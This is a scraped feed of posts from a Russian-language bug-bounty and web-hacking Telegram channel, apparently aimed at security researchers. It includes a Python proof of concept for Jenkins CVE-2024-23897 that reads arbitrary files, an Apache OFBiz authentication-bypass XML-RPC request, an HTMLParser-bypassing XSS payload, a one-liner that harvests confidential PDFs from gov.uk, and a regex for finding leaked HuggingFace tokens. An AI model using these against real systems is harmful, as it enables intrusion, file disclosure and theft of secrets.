11529
Чат: @shadow_chat_tg Предложения, вопросы, сотрудничество: @shdwpwn
😈 Обнаружение нестандартных заголовков в API с помощью фильтров Burp Bambdas
Что, если я скажу вам, что многие API используют нестандартные пользовательские HTTP-заголовки для управления бизнес-логикой и поведением?
Одним из простых способов увидеть такие заголовки в Burp, является применение шаблона для Bambdas:
if( !requestResponse.hasResponse() )
{
return false;
}
String[] standardHeaders = {
"accept-patch",
"accept-ranges",
"access-control-allow-credentials",
"access-control-allow-headers",
"access-control-allow-methods",
"access-control-allow-origin",
"access-control-expose-headers",
"access-control-max-age",
"age",
"allow",
"alt-svc",
"cache-control",
"clear-site-data",
"connection",
"content-disposition",
"content-encoding",
"content-language",
"content-length",
"content-location",
"content-range",
"content-security-policy",
"content-transfer-encoding",
"content-type",
"cross-origin-embedder-policy",
"cross-origin-opener-policy",
"cross-origin-resource-policy",
"date",
"delta-base",
"etag",
"expect-ct",
"expires",
"feature-policy",
"host",
"im",
"keep-alive",
"last-modified",
"link",
"location",
"pragma",
"proxy-authenticate",
"public-key-pins",
"referrer-policy",
"retry-after",
"server",
"set-cookie",
"strict-transport-security",
"tk",
"trailer",
"transfer-encoding",
"upgrade",
"vary",
"via",
"warning",
"www-authenticate",
"x-content-type-options",
"x-frame-options",
"x-permitted-cross-domain-policies",
"x-xss-protection"
};
List headersList = Arrays.asList(standardHeaders);
var headers = requestResponse.response().headers();
List unexpectedHeaders = new ArrayList();
for( var header : headers ) {
var headerName = header.name().toLowerCase();
if( !headersList.contains( headerName ) ) {
unexpectedHeaders.add( headerName );
}
}
if( unexpectedHeaders.size() > 0 ) {
requestResponse.annotations().setHighlightColor( HighlightColor.GRAY );
requestResponse.annotations().setNotes(
"Non-standard Headers: " + String.join( ",", unexpectedHeaders )
);
}
else {
// Maybe don't trample on existing Notes in the future??
requestResponse.annotations().setHighlightColor( HighlightColor.NONE );
requestResponse.annotations().setNotes("");
}
return true;
💻 Раскрытые уязвимости с багбаунти, ч.8
1️⃣ Remote Code Execution через Local File Inclusion
2️⃣ Reflected XSS на поддомене American Airlines
3️⃣ Stored XSS на сайте Microsoft
#web #rce #xss
Jenkins RCE CVE-2024-23897
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j.
PoC
import threading
import http.client
import time
import uuid
import urllib.parse
import sys
if len(sys.argv) != 3:
print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')
exit()
data_bytes = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + sys.argv[2].encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
target = urllib.parse.urlparse(sys.argv[1])
uuid_str = str(uuid.uuid4())
print(f'REQ: {data_bytes}\n')
def req1():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "download"
})
print(f'RESPONSE: {conn.getresponse().read()}')
def req2():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "upload",
"Content-type": "application/octet-stream"
}, body=data_bytes)
t1 = threading.Thread(target=req1)
t2 = threading.Thread(target=req2)
t1.start()
time.sleep(0.1)
t2.start()
t1.join()
t2.join()
python poc.py http://127.0.0.1:8888/ [/etc/passwd]
💰Как предложение от банка привело к раскрытию личных данных и награде в 5000$
Небольшой рассказ о том, как обычное почтовое предложение позволяло злоумышленнику получить доступ к данным других пользователей и раскрыть конфиденциальную личную информацию.
Ссылка на статью
#web #idor #leak
⛈ Как ломать 1С-Битрикс
Привет! Теперь я могу выложить статью с помощью которой проскочил на Standoff Hacks. Также команда standoff 365 помогла её отредактировать, за что большое спасибо и теперь я выложил её на хабр 👍
Краткое содержание статьи
⬜️ Что делать, если по всем известной методичке про атаки на битрикс ничего не найдено
⬜️ Откуда появляются самописные скрипты в битриксе
⬜️ Охота и разведка на самописные php скрипты разработчиков
⬜️ Атака + кейс с работы
Приятного чтения & Happy hacking ☺️
📶 Как ломать сайты на «1С-Битрикс»
ЧТНП | #web
Oh yes, ping pong
Под конец прошлого года, прошла шумиха с Apache Ofbiz, который позволял сделать байпас аутентификации и проабьюзать XML-RPC. Решил глянуть, что это было и как оно происходит 😺
Суть заключается в том, что XML-RPC, по логике можно использовать только с валидными кредами, но глянем на сам момент аутентификации юзера в LoginWorker.java
List<String> unpwErrMsgList = new LinkedList<String>();
if (UtilValidate.isEmpty(username)) {
unpwErrMsgList.add(UtilProperties.getMessage(resourceWebapp, "loginevents.username_was_empty_reenter", UtilHttp.getLocale(request)));
}
if (UtilValidate.isEmpty(password) && UtilValidate.isEmpty(token)) {
unpwErrMsgList.add(UtilProperties.getMessage(resourceWebapp, "loginevents.password_was_empty_reenter", UtilHttp.getLocale(request)));
}
boolean requirePasswordChange = "Y".equals(request.getParameter("requirePasswordChange"));
if (!unpwErrMsgList.isEmpty()) {
request.setAttribute("_ERROR_MESSAGE_LIST_", unpwErrMsgList);
return requirePasswordChange ? "requirePasswordChange" : "error";
}
requirePasswordChange, который не обращает внимание на то, введет ли юзер валидные креды. Если юзер в качестве параметра отдает Y, то метод login(HttpServletRequest request, HttpServletResponse response) вернет строку requirePasswordChangecheckLogin() и там уже идет следующий моментif (username == null
|| (password == null && token == null)
|| "error".equals(login(request, response)))
"error".equals(login(request, response)) не будет срабатывать, т.к мы заставили login(...) вернуть requirePasswordChangeXML-RPC/webtools/control/ping?USERNAME=&PASSWORD=s&requirePasswordChange=Y
POST /webtools/control/xmlrpc/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1Читать полностью…
Host: localhost:8443
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Length: 4002
Content-Type: application/xml
<?xml version="1.0"?>
<methodCall>
<methodName>Methodname</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>test</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">serialized_shell</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
#quick #XSS
Многие забывают, что парсинг html на бекенде - довольно сложный процесс. Поэтому на уровне даже стандартных парсеров популярных языков программирования - он не реализован полностью
Рассмотрим код на python:
from html.parser import HTMLParser
class MyHTMLParser(HTMLParser):
def handle_starttag(self, tag, attrs):
print(f"{tag}")
for attr in attrs:
print(f" ->{attr[0]}: {attr[1]}")
def handle_endtag(self, tag):
pass
def handle_startendtag(self, tag, attrs):
print(f"{tag}")
for attr in attrs:
print(f" ->{attr[0]}: {attr[1]}")
def handle_data(self, data):
pass
html_string = input()
parser = MyHTMLParser()
parser.feed(html_string)
"iframe", "noembed", "noframes", "noscript", "plaintext", "title", "textarea", "xmp"
<textarea><a href="x></textarea><img src=x onerror=alert()//">
textarea
a
->href: x></textarea><img src=x onerror=alert()//
<textarea><a href="x></textarea><img src="x" onerror="alert()//"">
📁 Массовый поиск конфиденциальных данных в PDF-файлах
Исследуя таргет часто попадается много pdf'ок, которые могут содержать конфиденциальные данные. Просматривать вручную все это очень долго, а потому можно попробовать автоматизировать этот процесс.
1️⃣ Используем gau для сбора конечных точек из wayback, urlscan и т.д.
2️⃣ Фильтруем конечные точки по расширению .pdf с помощью Grep.
3️⃣ Проверяем с httpx, что url живой и возвращает 200 ОК.
4️⃣ С помощью curl'а смотрим все живые pdf'ки.
5️⃣ Конвертируем PDF в текст. Для этого есть утилитка pdftotext, которая, как видно из названия, умеет переводить из pdf в текст. Устанавливается так:
sudo apt install poppler-utils
internal use only" или "confidential" и т.д.for i in $(echo "gov.uk" | gau --subs --threads 16 | grep -E -o 'https?://[^[:space:]]+\.pdf' | httpx -silent -mc 200); do if curl -k -s $i | pdftotext -q - - | grep -Eaiq 'confidential|internal use only'; then echo $i | tee output.txt; fi; done
gov.uk" и его поддомены в поиске URL-ов с PDF-файлами. Затем она проверяет каждый PDF-файл на наличие строк "confidential" или "internal use only" и записывает эти URL-ы в файл "output.txt".
🔑 Утечки ключей HuggingFace
С развитием нейросетей увеличилось число сервисов для работы с ними, что в свою очередь дарит нам возможность поискать утекшие токены от этих сервисов.
Вот тут, например, исследователь нашел 1681 валидный токен через HuggingFace и GitHub у таких гигантов как Meta, Microsoft, Google и Vmware и получил полный доступ к репозиториям Meta-Llama, Bloom, Pythia и HuggingFace.
Можно взять себе на заметку и добавить регулярку к списку своих дорков, так как я ее не видел ни в одном из популярных публичных списков, а также проанализировать похожие сервисы на утечки./hf_([a-zA_Z0-9]{32,})/
#web #recon #leak #dork
☕️² Время собирать подводные камни — в Java
Паша рассказал о подводных камнях веб-приложений на Java на примере четырёх способов исполнить произвольный код через малоизвестные компоненты и странности их поведения.
В программе: RCE через Spring View Manipulation, RCE через Java Deserialization, RCE через Java Naming and Directory Interface и RCE через FastJSON. Бонусом Паша показал ещё одну хитрую RCE-цепочку в своём таске на Java Attach API для Беллюминара (WCTF) 2020.
Доклад будет полезен тем, кто хочет узнать больше фишек и забытых механизмов в Java-вебчике, чтобы расширить свой багхантерский потенциал.
Видео: youtu.be/HVWW_tNoLkY
Презентация: vk.com/doc-114366489_607590017
— vk.com/wall-114366489_2279 —
📁Отслеживаем изменения в файлах JS
Недавно было раскрыто несколько отчетов (например тут или тут), где исследователь просто отслеживал изменения в файлах JS и таким образом находил уязвимости.
Почитать подробнее об этом вы можете тут, а ниже прикладываю инструмент, который поможет вам отслеживать такие изменения и информировать вас о них в телеграмм.
Thx @cyb3r4z
Ссылка на GitHub
#web #tools #js
📝Подборка обходов различных WAF
Автор собрал советы по обходу waf из Twitter'а и упаковал это в едином репозитории.
Ссылка на GitHub
#web #waf #bypass
🔐Кража кода OAuth через Reverse Proxy для захвата аккаунта
Построение цепочки уязвимостей для получения захвата аккаунта в один клик.
Ссылка на статью
#web #oauth #ato
Сегодняшний день богат на новые крутые ББ-программы :)
Positive Technologies объявили программу вместе с Wildberries
/channel/standoff_365/319
А BI.ZONE Bug Bounty запустили первую программу совместно с правительством Ленинградской области.
Тот случай, когда можно безопасно тестировать гос ресурсы 😄
https://app.bugbounty.bi.zone/companies/piou-lenobl/main
И, как подсказывают в комментариях, SkillBox, GeekBrains, SkillFactory подняли выплаты в 3 раза до 15 декабря
Настало время выходить из осенней спячки :)
⚡️IDOR в CloudTips
Подготовили для вас статью, посвящённую разбору бага, найденного нашим исследователем на Bug Bounty Cloud Tips👾
📣Ссылка на статью:
https://habr.com/ru/articles/775814/
#web #pentest #byapsecurity #bugbounty
😒 Apache Tomcat HTTP Request Smuggling (Client- Side Desync)
Недавно была найдена критическая уязвимость в Apache Tomcat, которой был присвоен код CVE-2024-21733.
Уязвимость позволяет злоумышленникам заставить браузер жертвы рассинхронизировать свое соединение с веб-сайтами, размещенными поверх Apache Tomcat, что приводит к контрабанде конфиденциальных данных с сервера и/или клиентских подключений (смотри скрин ниже).
Для получения дополнительной информации об атаках десинхронизации со стороны клиента, можете почитать исследование Джеймса Кеттла.
Ссылка на отчет
#web #cve #poc
Подделка подписей на Github
Перед тем, как что-нибудь закоммитить в репозиторий, git просит пользователя указать имя и email. Если сделать так
git config --global user.name "Linus Torvalds"
git config --global user.email "torvalds@linux-foundation.org"
GitHub <noreply@github.com> и тоже будет считаться верифицированным. gh-gpgsign и возвращает подписанный результат./\Aauthor (.+?) <(.+)>/, должны быть равна имени текущего залогиненного пользователя.author <583231+octocat@users.noreply.github.com> 1682188800 +0000
author username <user@example.com> 1682188800 +0000
История одной уязвимости в Chrome
Очень простая уязвимость, которую я нашел в Google Chrome. И за которую получил 16000$.
Попытался дать побольше контекста, чтобы увеличить пользу от прочтения материала.
Habr
Twitter
P.S. Лучшей благодарностью, если вам понравился материал - является его распространение.
🤕 Неочевидные угрозы: как защититься от атак на десериализацию, XSS и чтение произвольных файлов
Злоумышленники могут успешно атаковать 98% веб-приложений. И это не просто громкие цифры, а данные из исследования Positive Technologies. Как такое возможно, если есть инструменты и практики типа SAST, DAST и WAF, а разработчики вроде бы нормально кодят?
Давайте я объясню, как устроены опасные атаки, на примере с разработчиком Василием, который работает в интернет-магазине и которому начальство подкидывает разные интересные задачки.
➡️ Читать далее
🌚 @poxek
👁 Курс на мисконфиги. Как поймать проблемный CORS на проде
На новогодних праздниках, вместо поедания мандаринов, решил совместно с SidneyJob, провести исследование поведений браузеров при мисконфигурации CORS.
Разобрали как работает SOP и CORS, посмотрели возможные мисконфиги и способы их эксплуатации, провели несколько экспериментов, и даже вспомнили, как работают регулярки.
Мы даже сделали для этого отдельную лабу! В ней ты сможешь создавать свои PoC'и при мисконфигурация CORS'a и сразу же кидать на них ссылки уже в отчёте.
Всё получившееся собрали вместе и выпустили как нашу первую статью на xakep.ru. Приятного чтения!
https://xakep.ru/2024/01/18/cors-cheatsheet/
💻 Раскрытые уязвимости с багбаунти, ч.7
1️⃣ IDOR при изменении информации о пользователе, позволяющий привязать свою почту к чужому аккаунту и получить к нему доступ
2️⃣ Повышение привелегий через изменение роли, открывающее админский функционал в приложении
3️⃣ Reflected XSS через скрытый параметр
#web #idor #logic #xss
Многие оставляют недоработанными вектора атак с self-XSS или XSS, заблокированной CSP. Иногда стоит уделить достаточно внимания каждой такой находке и посмотреть на уязвимость с другой стороны 😈
В этой статье мы рассмотрим различные методы и техники, которые расширяют границы XSS-атак: эксплуатацию XSS через service-worker, self-XSS в один клик и другие сочетания уязвимостей 💎
https://telegra.ph/XSS-Advanced-Level-01-09
🎄 Дорогие подписчики, поздравляю вас с наступающим Новым Годом!
Желаю, чтобы ваши поиски всегда были успешными, а каждая найденная уязвимость приносила не только удовлетворение, но и заслуженное вознаграждение.
Пусть Новый год будет полон интересных открытий и невероятных находок и принесет вам радость, удачу и множество приятных сюрпризов. До встречи в новом году!
SMTP Smuggling - Spoofing E-Mails Worldwide. Очень крутой, при этом подробный ресерч. Вкратце, благодаря смаглу сообщений, позволяет отправить сообщение от имени любого пользователя почтового сервера в обход фильтров.
https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/
P.S. Ну и судя по реакции вендоров, они того рот ... патчить это дело😁 А значит ждем много отчётов об апте, использующей данный метод
#initial #fishing #pentest #redteam
Разработчики любят писать микросервисы для "перекладывания JSON". Стандарт устоявшийся и, как правило, не сулит проблем. Но так ли это на самом деле?
Возьмем небольшое приложение с двумя микросервисами:
— Cart — реализует бизнес-логику корзины
— Payment — используется для обработки платежей
Cart написан на Python с Flask и принимает ID товаров с их количеством. Попробуем отправить в него запрос с двумя одинаковыми ключами:
"cart": [
{
"id": 0,
"qty": 5
},
{
"id": 1,
"qty": -1,
"qty": 1
}
]
jsonschema.validate(instance=data, schema=schema). Убедится, что id: 0 <= x <= 10 and qty: >= 1. На этом этапе не будет ошибки (не смотря на то, что один из отправленных qty не подходит под условие), поскольку Flask использует стандартный JSON-парсер из Python, а тот сериализует данные, отдавая приоритет последнего ключа (qty = 1).qty = -1). Считает итоговую сумму total = total + productDB[id]["price"].(int64) * qty и генерирует чек.
🐔 XSS и CSRF в Twitter
Тут багхантер взял недавно слитую XSS , за которую не заплатили и докрутил ее до импакта, позволяющего выполнять различные действия в вашем аккаунте в Twitter, вплоть до его захвата. Однако ему за это тоже не заплатили и он так же решил слить уязвимость на всеобщее обозрение.
Ссылка на пост
#web #csrf
🔍 Поиск утечек у пользователей организации
Один из рабочих способов поиска утечек в GitHub'е организации, это собрать список ее пользователей и проверять их репозитории на утечки.
Любой общедоступный репозиторий в учетной записи пользователя организации, созданный случайно или для тестирования, может содержать утечки конфиденциальной информации, внутренний код и т.д.
Данный процесс можно автоматизировать и один из инструментов, который может помочь вам, называется git-alerts. Вы можете ознакомиться с ним по ссылке ниже.
Ссылка на GitHub
#web #recon #tools
Что было по ББ на Standoff:
Как выжить «мобильщику» на багбаунти - https://www.youtube.com/watch?v=TPSvVtF6vmw
Олды в багбаунти: как поменялись баги и подходы за последние 7–8 лет - https://www.youtube.com/watch?v=FRGHW5auZsI
Как выжить на bug bounty: история исследователя безопасности - https://www.youtube.com/watch?v=PvIFiHKfDgw
Систематизируем багбаунти с помощью аномалий - https://www.youtube.com/watch?v=TVKyU24n0fk
📄 #наработки #web #offense
➡️Моя статья, победившая в конкурсе от Standoff365, увидела свет на Habr! 👈
1️⃣ Основы работы почты
2️⃣ Потенциальные уязвимости
3️⃣ Демонстрация эксплуатации
🧩 Habr: E-mail Injection
✨ DeteAct Blog: E-mail Injection
😰 HaHacking_Mail-Injection.pdf ⬇️
❓) Откуда?
Не так давно столкнулась с ситуацией, когда форма на сайте отправляла ответы пользователей в виде писем на выделенную для этого почту.
На первый взгляд – обычная ситуация, а на второй – вывалившийся лог SMTP сервера навёл на мысли об изучении спектра потенциальных уязвимостей, которые могут вытекать из специфики почтовой функциональности;
➡️ Результаты – оформила в виде статьи ⚡️
❓) Что?
[ Подготовила небольшие примеры уязвимых приложений + каждое наглядно проэксплуатировала ]
🧩 qwqoro/Mail-Injection [ 💻 / 💻 / 🐍 ]
➖CRLF (SMTP / IMAP) Injection
➖Arbitrary Command Flag Injection
➖Improper Input Validation
// Время чтения: ~20 минут
➡️Enjoy! 📝
@HaHacking 🐇